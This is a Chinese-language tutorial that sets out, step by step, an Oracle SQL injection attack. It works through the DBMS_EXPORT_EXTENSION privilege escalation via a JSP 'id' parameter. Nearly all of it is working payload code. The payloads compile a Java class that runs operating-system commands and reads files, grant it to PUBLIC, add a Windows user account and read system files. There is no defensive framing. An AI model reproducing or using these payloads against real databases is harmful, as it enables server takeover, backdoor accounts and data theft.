
Oracle辅导:oracleSQL注入命令总结

以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
    /xxx.jsp?id=1 and ''1''''a''||(select SYS.DBMS_EXPORT_EXTENSION.....)
    的形式即可。(用" ''a''|| "是为了让语句返回true值)
    语句有点长,可能要用post提交。
    以下是各个步骤:
    1.创建包
    通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
    /xxx.jsp?id=1 and ''1''''a''||(
    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
    create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
    new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
    }'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
    )
    ------------------------
    如果url有长度限制,可以把readFile()函数块去掉,即:
    /xxx.jsp?id=1 and ''1''''a''||(
    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
    create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
    new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
    }'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
    )
    同时把后面步骤中提到的对readFile()的处理语句去掉。
    ------------------------------
    2.赋Java权限
    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''begin dbms_java.grant_permission( ''''''''''''''''PUBLIC'''''''''''''''', ''''''''''''''''SYS:java.io.FilePermission'''''''''''''''', '''''''''''''''''''''''''''''''', ''''''''''''''''execute'''''''''''''''' );end;'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
    3.创建函数
    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
    create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''''''''''LinxUtil.runCMD(java.lang.String) return String'''''''''''''''';   '''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
    create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''''''''''LinxUtil.readFile(java.lang.String) return String'''''''''''''''';   '''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
    4.赋public执行函数的权限
    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''grant all on LinxRunCMD to public'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''grant all on LinxReadFile to public'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
    5.测试上面的几步是否成功
    and ''1''''11''||(
    select OBJECT_ID from all_objects where object_name =''LINXRUNCMD''
    )
    and ''1''(
    select OBJECT_ID from all_objects where object_name =''LINXREADFILE''
    )
    6.执行命令:
    /xxx.jsp?id=1 and ''1''(
    select sys.LinxRunCMD(''cmd /c net user linx /add'') from dual
    )
    /xxx.jsp?id=1 and ''1''(
    select sys.LinxReadFile(''c:/boot.ini'') from dual
    )
    注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1" 代替 "and ''1''"。